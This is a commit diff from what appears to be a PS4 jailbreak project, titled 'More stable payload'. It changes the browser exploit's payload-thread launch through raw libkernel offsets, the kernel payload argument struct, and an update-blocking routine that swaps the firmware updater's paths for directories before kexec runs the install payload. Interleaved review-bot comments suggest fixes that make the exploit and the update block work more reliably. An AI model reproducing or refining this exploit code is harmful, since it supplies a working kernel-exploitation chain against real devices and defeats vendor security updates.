

More stable payload
xvortex committed Feb 13, 2018
1 parent 83b1348 commit 907275b
Showing 6 changed files with 16 additions and 35 deletions.
2 changes: 1 addition & 1 deletion exploit/fix.js


26 changes: 3 additions & 23 deletions exploit/index.html
Expand Up @@ -628,32 +628,12 @@
// Launch thread
var thread_id_ptr = malloc(0x08);
var thread_name = malloc(0x100);
var exit_code_ptr = malloc(0x08);

p.writeString(thread_name, "payload");

// run payload forever
for (;;)
{
var result = p.call(libkernel.add32(0x11570), thread_id_ptr, 0, code_addr, 0, thread_name);
print("scePthreadCreate: 0x" + result);
if (result == 0)
{
var thread_id = p.read8(thread_id_ptr);
print("thread: 0x" + thread_id);
var result = p.call(libkernel.add32(0x11610), thread_id, exit_code_ptr);

print("scePthreadJoin: 0x" + result);
if (result == 0)
{
var exit_code = p.read8(exit_code_ptr);
print("exit code: " + exit_code);
print("=== Done ===");
alert("Done");
break;
}
}
}
print("scePthreadCreate: 0x" + p.call(libkernel.add32(0x11570), thread_id_ptr, 0, code_addr, 0, thread_name));
print("thread: 0x" + p.read8(thread_id_ptr));
print("=== Done ===");
}
else
{
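Review bot: The one-shot launch `print("scePthreadCreate: 0x" + p.call(libkernel.add32(0x11570), ...))` drops the `result == 0` check the removed loop had, so when scePthreadCreate fails the next line still reads `thread_id_ptr` (freshly malloc'd, never written by the call) and "=== Done ===" is printed as though the payload were running. Keep the return value and gate the thread-id print on it: `var result = p.call(libkernel.add32(0x11570), thread_id_ptr, 0, code_addr, 0, thread_name);` / `print("scePthreadCreate: 0x" + result);` / `if (result == 0) print("thread: 0x" + p.read8(thread_id_ptr));`. With scePthreadJoin gone the script no longer waits for the payload thread at all, which is presumably the intended "more stable" behaviour but should be stated in a comment above the call. The enclosing function starts before this hunk and its else-branch continues past it.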
2 changes: 1 addition & 1 deletion exploit/payload.js


4 changes: 4 additions & 0 deletions installer/include/debug.h
@@ -1,6 +1,10 @@
#ifndef DEBUG_H
#define DEBUG_H

#define PRIx64 "llx"
#define PRIu64 "llu"
#define PRId64 "lld"

int sock;

void initDebugSocket(void);
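Review bot: `PRIx64`, `PRIu64` and `PRId64` are the names `<inttypes.h>` defines, so the three unconditional `#define`s added at the top of this header will clash (redefinition warnings, or a hard error if the SDK's expansions differ) in any translation unit that also pulls in that header. Guard them, `#ifndef PRIx64` … `#endif` around the three lines, or include `<inttypes.h>` instead if this toolchain ships it. Also, on an LP64 target `uint64_t` is commonly `unsigned long`, so `"llx"` will draw `-Wformat` warnings even though the widths agree — confirm what this SDK's `<stdint.h>` uses before relying on these expansions.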
3 changes: 2 additions & 1 deletion installer/include/defines.h
@@ -1,7 +1,7 @@
#ifndef __DEFINES
#define __DEFINES

#define VERSION "1.2"
#define VERSION "1.3"

//#define DEBUG_SOCKET

Expand Down Expand Up @@ -91,6 +91,7 @@ struct install_payload_args

struct kernel_payload_args
{
void* syscall_handler;
uint64_t user_arg;
};

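Review bot: The new `void* syscall_handler;` is inserted ahead of `user_arg` in `struct kernel_payload_args`, which moves `user_arg` from offset 0 to offset 8 and changes the layout every producer of this struct must match; no C file in this commit shows that producer, so it is presumably assembled on the userland/ROP side, and the exploit JS changes in this commit are not rendered here — double-check it was updated in step. Appending the field after `user_arg` would have kept the existing offset. The field should also carry a comment, e.g. `void* syscall_handler; /* provided by whoever builds this struct; field order is ABI with that side */`. Its consumer is `kernel_payload(struct thread *td, struct kernel_payload_args* args)` in main.c, per the hunk context in this commit.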
14 changes: 5 additions & 9 deletions installer/source/main.c
Expand Up @@ -286,16 +286,9 @@ int kernel_payload(struct thread *td, struct kernel_payload_args* args)
static inline void patch_update(void)
{
unlink(PS4_UPDATE_FULL_PATH);

DIR* directory = opendir(PS4_UPDATE_TEMP_PATH);

if(directory != NULL)
{
closedir(directory);
return;
}

unlink(PS4_UPDATE_TEMP_PATH);

mkdir(PS4_UPDATE_FULL_PATH, 0777);
mkdir(PS4_UPDATE_TEMP_PATH, 0777);
}

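Review bot: In `patch_update`, `mkdir(PS4_UPDATE_TEMP_PATH, 0777)` now runs without the `unlink(PS4_UPDATE_TEMP_PATH)` the removed block performed, so if a regular file already sits at that path mkdir fails with EEXIST and the temp path is left unblocked, while only the full path keeps its unlink. Restore it and tighten the mode: `unlink(PS4_UPDATE_TEMP_PATH);` before the two mkdir calls, and `0555` in place of `0777` unless something actually needs to write into these directories. Neither mkdir's return value is checked, so a failure is silent; at minimum report errno under `DEBUG_SOCKET`. That the directory-in-place-of-file swap is meant to stop the updater from staging its download is inferred from the path names, not shown in this hunk.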
Expand All @@ -305,6 +298,8 @@ int _main(struct thread *td) {
initKernel();
initLibc();

sceKernelSleep(1);

#ifdef DEBUG_SOCKET
initNetwork();
initDebugSocket();
Expand All @@ -327,6 +322,7 @@ int _main(struct thread *td) {
struct payload_info payload_info;
payload_info.buffer = payload_data;
payload_info.size = payload_size;

errno = 0;

result = kexec(&install_payload, &payload_info);
